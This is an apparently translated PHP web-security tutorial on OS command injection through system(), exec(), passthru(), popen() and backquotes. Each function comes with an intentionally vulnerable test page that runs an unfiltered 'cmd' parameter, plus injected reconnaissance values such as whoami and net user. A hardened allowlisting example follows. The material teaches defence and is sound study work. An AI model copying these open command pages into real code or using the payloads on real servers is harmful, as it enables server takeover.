[OS command injection 01] Common functions that may cause OS command injection (system, exec, passthru, popen and the backquote construct)

1. Overview of OS command injection

  1. Background: scripting languages such as PHP make application development fast, concise and convenient, but they also bring some drawbacks, such as slower execution and no direct access to the lower layers of the system. Applications, and especially enterprise applications, often need to call external programs (system commands or executables such as .exe files), and they do so through the language's system command functions.
  2. OS command injection: when the application calls these system command functions and user input is concatenated into the command as an argument without being filtered, a command execution vulnerability results.
  3. Conditions:
    1. The program contains functions or language constructs that can execute OS commands;
    2. The arguments passed to the function or language construct can be controlled by the client (directly modified or influenced).
  4. Impact:
    1. Execute system commands with the privileges of the Web server process (the Web user's privileges);
    2. Read and write files with the privileges of the Web server process (the Web user's privileges);
    3. Reverse shell. Normally, when we access a server with port 80 open, we establish a connection to the server's Web service and receive the corresponding Web content. With a reverse shell it is the other way round: we open a port and listen, then make the server actively connect back to our host with a shell, after which we can control the server remotely through the received shell.
    4. Control of the whole website;
    5. Control of the entire server.

2 Related functions

2.1 system() function

  1. Function: this function executes a string as an OS command and outputs the result itself.
  2. Prototype: string system(string $command [, int &$return_var]).
  3. Harm: if the argument of this function is not filtered effectively and precisely, a user can inject harmful commands through it.
  4. The test code is as follows:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	system($_GET['cmd']);
}else{
	echo"?cmd=ipconfig";
}
?>
  5. When we visit the web page from the client side with the following parameters, the page executes the constructed statement and returns the system information (the same holds for the functions below). The injected command must match the target system.
?cmd=ipconfig				//IP configuration information will be returned
?cmd=systeminfo				//System information will be returned
?cmd=whoami					//The current user name will be returned
?cmd=net user				//View or add users, etc.
?cmd=dir					//File information will be returned
?cmd=ping www.baidu.com		//The result of ping is not returned until the command finishes. On Windows, ping sends 4 packets by default; on Linux it runs until interrupted.

2.2 exec() function

  1. Function: this function executes a string as an OS command; it does not print the result itself, so it must be combined with a statement that outputs its return value (print/echo).
  2. Prototype: string exec(string $command [, array &$output [, int &$return_var]]).
  3. Harm: if the argument of this function is not filtered effectively and precisely, a user can inject harmful commands through it.
  4. The test code is as follows:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	print exec($_GET['cmd']);
}else{
	echo"?cmd=whoami";
}
?>

2.3 passthru() function

  1. Function: executes an external program and displays its raw output.
  2. Prototype: void passthru(string $command [, int &$return_var])
  3. Harm: if the argument of this function is not filtered effectively and precisely, a user can inject harmful commands through it.
  4. The test code is as follows:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	passthru($_GET['cmd']);	// the original had the typo "passture", which would be an undefined function
}else{
	echo"?cmd=whoami";
}
?>

2.4 popen() function

  1. Function: this function executes an OS command and returns a file pointer. Whatever is returned, what matters to us is that the command is executed.
  2. Feature: unlike the other functions, it requires a second argument, the mode in which the stream holding the result of the first argument is opened ('r' in the test code below).
  3. The test code is as follows:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	echo"<pre>";
	popen($_GET['cmd'],'r');
}else{
	echo"?cmd=whoami";
}
?>
  4. When we visit the web page from the client side with the following parameters, the page executes the constructed statement and writes the output to a file in the same directory (appending to it if the file already exists).
?cmd=ipconfig >>1.txt				//IP configuration information will be written
?cmd=systeminfo >>1.txt				//System information will be written
?cmd=whoami >>1.txt					//The current user name will be written
?cmd=net user >>1.txt				//View or add users, etc.
?cmd=dir >>1.txt					//File information will be written
?cmd=ping www.baidu.com >>1.txt		//The result of ping is not written until the command finishes. On Windows, ping sends 4 packets by default; on Linux it runs until interrupted.

2.5 backquote structure

  1. Function: a string enclosed in backquotes is also parsed and executed as an OS command, and the result of the execution is returned as the value of the expression.
  2. Note:
    1. The backquote operator is disabled when safe mode is enabled or when shell_exec() is disabled.
    2. Unlike some other languages, backquotes cannot be used inside double-quoted strings.
  3. The test code is as follows:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){
	$cmd=$_GET['cmd'];
	print(`$cmd`);
}else{
	echo"?cmd=whoami";
}
?>
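A hardened counterpart to the "?cmd=" test pages above, added here as an example and not code from the original post. The request never supplies a command string; it supplies only an allowlisted action name and a host that is validated and then quoted, which removes the condition "the argument can be controlled by the client" that every section above relies on. The ping/host scenario and the `action` and `host` parameter names are assumptions.

```php
<?php
// Added example (not from the original post): hardened replacement for the
// "?cmd=" test pages. Assumed scenario: the page only needs to run "ping"
// against a host chosen by the client; the command itself is fixed server-side.
declare(strict_types=1);

// Command templates live here, on the server. The client selects a key only.
const ALLOWED_ACTIONS = [
    'ping' => PHP_OS_FAMILY === 'Windows' ? ['ping', '-n', '4'] : ['ping', '-c', '4'],
];

// Accept only a plain host name: letters, digits, dots and hyphens, at most 253 chars.
// Every shell metacharacter used in the payloads above (';', '|', '&', '`', '$', '>',
// whitespace) fails this pattern, so it never reaches the shell.
function validate_host(string $host): ?string
{
    if (strlen($host) > 253
        || !preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$/', $host)) {
        return null;
    }
    return $host;
}

// Build the final command line from the template plus the validated host.
// escapeshellarg() is defence in depth: each piece is quoted as one argument,
// so even a value that slipped past validation cannot start a second command.
function build_command(string $action, string $host): ?string
{
    if (!isset(ALLOWED_ACTIONS[$action])) {
        return null;
    }
    $parts = array_merge(ALLOWED_ACTIONS[$action], [$host]);
    return implode(' ', array_map('escapeshellarg', $parts));
}

$action  = is_string($_GET['action'] ?? null) ? $_GET['action'] : 'ping';
$hostRaw = $_GET['host'] ?? '';
$host    = is_string($hostRaw) ? validate_host($hostRaw) : null;
$cmd     = $host === null ? null : build_command($action, $host);

if ($cmd === null) {
    http_response_code(400);
    echo 'invalid action or host';
} else {
    $output = [];
    exec($cmd, $output, $rc);
    // HTML-escape the output so command output cannot inject markup into the page.
    echo '<pre>' . htmlspecialchars(implode("\n", $output), ENT_QUOTES, 'UTF-8') . '</pre>';
}
```

Requesting `?host=www.baidu.com` runs the fixed ping template, while `?host=www.baidu.com;whoami` or `?host=x>>1.txt` is rejected with a 400 before any command function is called.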

3 Summary

  1. Understand the functions that may cause OS command injection;
  2. Master how these functions are used.

Keywords: PHP Operating System security Web Security

Added by jonnym00 on Sun, 27 Feb 2022 06:35:42 +0200